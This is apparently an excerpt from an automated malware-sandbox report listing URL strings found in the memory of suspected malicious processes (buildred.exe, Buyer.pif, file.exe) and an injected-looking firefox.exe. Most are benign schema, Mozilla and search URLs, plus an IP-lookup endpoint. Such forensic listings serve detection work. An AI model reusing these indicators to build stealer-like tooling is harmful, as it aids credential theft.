Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/D
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: PharmaciesDetection.exe, 00000015.00000003.2676783589.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.exe, file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2906777467.0000026192B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2914617240.00000261932BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2926539269.0000026194A80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2945658971.000002640003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922562667.0000026194615000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000028.00000002.2906777467.0000026192B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulN&
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulg
Source: file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441439634.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2808523111.0000026192480000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: buildred.exe, 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000028.00000002.2925172791.0000026194847000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
